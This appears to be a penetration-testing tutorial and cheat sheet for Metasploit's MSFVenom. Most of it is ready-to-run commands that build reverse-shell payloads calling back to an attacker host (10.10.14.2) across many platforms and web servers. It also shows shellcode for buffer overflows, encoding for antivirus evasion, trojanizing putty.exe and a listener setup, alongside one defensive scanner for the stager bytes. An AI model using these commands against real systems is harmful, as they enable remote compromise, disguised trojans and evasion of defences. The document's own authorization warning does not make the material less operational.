
🧪 Introduction to MSFVenom

MSFVenom is Metasploit's standalone payload generator and encoder. It combines the functionality of the old msfpayload and msfencode tools into a single utility. Use it to generate payloads in virtually any format — from raw shellcode to Windows executables, Python scripts, PowerShell one-liners, and more.


1️⃣ Basic Syntax

msfvenom -p <payload> [options] -f <format> -o <output_file>
Flag        Description
-p          Payload to use (e.g., windows/meterpreter/reverse_tcp).
-f          Output format (e.g., exe, elf, raw, python, c, ps1).
-o          Output file path.
-e          Encoder to use (e.g., x86/shikata_ga_nai).
-i          Number of encoding iterations.
-b          Bad characters to avoid (e.g., '\x00\x0a\x0d').
-a          Architecture (x86, x64).
--platform  Target platform (windows, linux, osx).
-n          NOP sled size (prepend NOP instructions).
-l          List available payloads, formats, encoders, etc.

2️⃣ Listing Available Options

# List all payloads
msfvenom -l payloads

# List all formats
msfvenom -l formats

# List all encoders
msfvenom -l encoders

# List all platforms
msfvenom -l platforms

# List all architectures
msfvenom -l archs

3️⃣ Common Payload Generation Examples

Windows Reverse Shell (EXE)

msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 \
  -f exe -o shell.exe

Windows Reverse Shell (Staged, x86)

msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 \
  -f exe -o shell_x86.exe

Linux Reverse Shell (ELF)

msfvenom -p linux/x64/meterpreter/reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 \
  -f elf -o shell.elf

macOS Reverse Shell (Mach-O)

msfvenom -p osx/x64/meterpreter/reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 \
  -f macho -o shell.macho

PHP Reverse Shell

msfvenom -p php/meterpreter/reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 \
  -f raw -o shell.php

Python Reverse Shell

msfvenom -p python/meterpreter/reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 \
  -f raw -o shell.py

ASP Reverse Shell (IIS)

msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 \
  -f asp -o shell.asp

ASPX Reverse Shell

msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 \
  -f aspx -o shell.aspx

JSP Reverse Shell (Tomcat)

msfvenom -p java/jsp_shell_reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 \
  -f raw -o shell.jsp

WAR File (Tomcat Deployment)

msfvenom -p java/jsp_shell_reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 \
  -f war -o shell.war

4️⃣ Generating Shellcode

For buffer overflow exploits you need the shellcode itself, emitted in the syntax of whichever language your exploit is written in:

C Format

msfvenom -p windows/shell_reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 \
  -b '\x00' \
  -f c

Output:

unsigned char buf[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b..."

Python Format

msfvenom -p windows/shell_reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 \
  -b '\x00' \
  -f python

PowerShell Base64

msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 \
  -f psh -o shell.ps1

Raw Shellcode (for custom exploit development)

msfvenom -p windows/shell_reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 \
  -b '\x00\x0a\x0d' \
  -f raw -o shellcode.bin
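The sample `-f c` output above begins with the stock, unencoded Metasploit x86 stager prelude, which is exactly the kind of well-known byte pattern the AV note in the Gotchas section refers to. The scanner below is an added example (not from the original page and not Metasploit's code) that flags that prelude in a raw shellcode file or in `-f c` / `-f python` text output; the signature bytes are copied from the sample output above, and the inputs at the bottom are constructed for the demo.

```python
"""Flag the unencoded Metasploit x86 stager prelude (added example, not part
of the page or of Metasploit). Signature: the first 13 bytes of the -f c
sample output shown above. The sample inputs below are constructed."""
import re
import sys

# Bytes from the page's sample output (cld; call; pushad; mov ebp,esp; ...).
# Encoding with -e or -b rewrites them, so this only matches default output.
STAGER_PRELUDE = bytes.fromhex("fce8820000006089e531c0648b")
HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")

def parse_escaped(text: str) -> bytes:
    """Recover raw bytes from the "\\xfc\\xe8..." escapes of -f c / -f python."""
    return bytes(int(h, 16) for h in HEX_ESCAPE.findall(text))

def looks_textual(data: bytes) -> bool:
    """True when every byte is printable ASCII or whitespace (text output)."""
    return all(32 <= b < 127 or b in (9, 10, 13) for b in data)

def find_prelude(blob: bytes) -> list:
    """Return every offset at which the unencoded prelude occurs."""
    hits, start = [], 0
    while (idx := blob.find(STAGER_PRELUDE, start)) != -1:
        hits.append(idx)
        start = idx + 1
    return hits

def scan(data: bytes) -> dict:
    """Scan file bytes; text output (-f c / -f python) is decoded first."""
    if looks_textual(data):
        data = parse_escaped(data.decode("ascii"))
    hits = find_prelude(data)
    return {"size": len(data), "offsets": hits, "suspicious": bool(hits)}

# Constructed samples: the page's -f c output, and the same prelude behind an
# 8-byte NOP sled (as -n 8 would add) followed by constructed filler bytes.
SAMPLE_C = ('unsigned char buf[] =\n'
            '"\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b";')
SAMPLE_RAW = b"\x90" * 8 + STAGER_PRELUDE + b"\xcc" * 4

if __name__ == "__main__":
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            print(path, scan(fh.read()))
    print("c-format:", scan(SAMPLE_C.encode()))  # offsets [0]
    print("raw:", scan(SAMPLE_RAW))  # offsets [8]
```

Run it against `shellcode.bin` from the command above to see the match; run it against an `-e`/`-b` encoded file to see why a single literal signature is a weak detection on its own.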

5️⃣ Encoding Payloads

# Single encoder, multiple iterations
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 \
  -e x86/shikata_ga_nai -i 5 \
  -f exe -o encoded_shell.exe

# Avoid specific bad characters (encoder is auto-selected)
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 \
  -b '\x00\x0a\x0d\xff' \
  -f exe -o no_bad_chars.exe

6️⃣ Injecting into Existing Executables

You can inject a payload into a legitimate executable to make it look less suspicious:

# Inject Meterpreter into a legitimate program
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 \
  -x /path/to/putty.exe \
  -k \
  -f exe -o trojan_putty.exe
Flag  Description
-x    Template executable to inject into.
-k    Keep the original executable's functionality (the payload runs in a separate thread).

Note

The -k flag doesn't work reliably with all executables. The resulting binary may crash or behave unexpectedly. Always test in a lab.


7️⃣ Setting Up the Listener

After generating a payload with MSFVenom, you must set up a matching handler in MSFconsole:

msf6 > use exploit/multi/handler
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 10.10.14.2
msf6 > set LPORT 4444
msf6 > exploit -j

[*] Started reverse TCP handler on 10.10.14.2:4444

Tip

The payload, LHOST, and LPORT in the handler must exactly match what you specified in the MSFVenom command. A mismatch will cause the connection to fail silently.


8️⃣ Quick Reference Cheat Sheet

Target          Payload                                  Format
Windows x64     windows/x64/meterpreter/reverse_tcp      -f exe
Windows x86     windows/meterpreter/reverse_tcp          -f exe
Linux x64       linux/x64/meterpreter/reverse_tcp        -f elf
macOS           osx/x64/meterpreter/reverse_tcp          -f macho
PHP Web Shell   php/meterpreter/reverse_tcp              -f raw
ASP Web Shell   windows/meterpreter/reverse_tcp          -f asp
JSP Web Shell   java/jsp_shell_reverse_tcp               -f raw
WAR (Tomcat)    java/jsp_shell_reverse_tcp               -f war
Python          python/meterpreter/reverse_tcp           -f raw
PowerShell      windows/x64/meterpreter/reverse_tcp      -f psh
C Shellcode     windows/shell_reverse_tcp                -f c

9️⃣ Gotchas

Note

Staged payloads need a handler. If you generate a staged payload (e.g., meterpreter/reverse_tcp) and deliver it without a running multi/handler, the stager will connect back but then die because nothing serves the stage. Use inline/singles (e.g., shell_reverse_tcp) when a handler isn't practical.

Note

Architecture matters. A 32-bit payload won't work on a 64-bit-only process, and vice versa. If you're unsure, generate both and test.

Note

Modern AV detects MSFVenom payloads. Default MSFVenom output is well-known to every antivirus vendor. For real engagements, you'll need additional obfuscation, custom packers, or evasion frameworks (see Firewall & IDS/IPS Evasion).

Note

PHP payloads need <?php ... ?> tags. The raw format for PHP payloads may not include the opening tag. Manually prepend <?php if needed.


Warning

MSFVenom generates weaponized payloads. Only create and deploy payloads against systems you have explicit written authorization to test.